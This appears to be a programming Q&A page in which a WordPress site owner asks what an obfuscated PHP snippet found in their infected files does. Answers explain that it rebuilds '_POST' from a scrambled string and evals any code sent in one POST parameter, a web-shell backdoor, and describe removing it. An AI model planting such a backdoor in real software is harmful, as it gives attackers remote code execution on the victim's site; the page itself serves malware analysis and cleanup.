TechQA.

What does this code?

267 views Asked by At

I have a wordpress site and it was infected with malware I think. I have found this bit of php code in my files

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}

What does it do?

php wordpress malware
Original Q&A
2

There are 2 answers

2
Thomas Nairn On BEST ANSWER 
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);

$s20 evaluates to _POST

if(isset(${$s20}['q140b2c'])){
    eval(${$s20}['q140b2c']);
}

becomes 

isset($_POST['q140b2c'])

eval then evaluates whatever is in that post

eval($_POST['q140b2c']);
0
test On

I face same issue with one of my previous website hack. Same code as above. They are going to put code this code in .php file before start of PHP tag.

So it will hold the execution of PHP site.

To solve download all code & search in file & remove. Then your site works ok.

Related Questions in PHP

Related Questions in WORDPRESS

Related Questions in MALWARE

Popular Questions

Popular Tags

javascript python java c# php android html jquery c++ css ios sql mysql r reactjs node.js arrays c asp.net json python-3.x ruby-on-rails .net sql-server swift django angular objective-c pandas excel

Trending Questions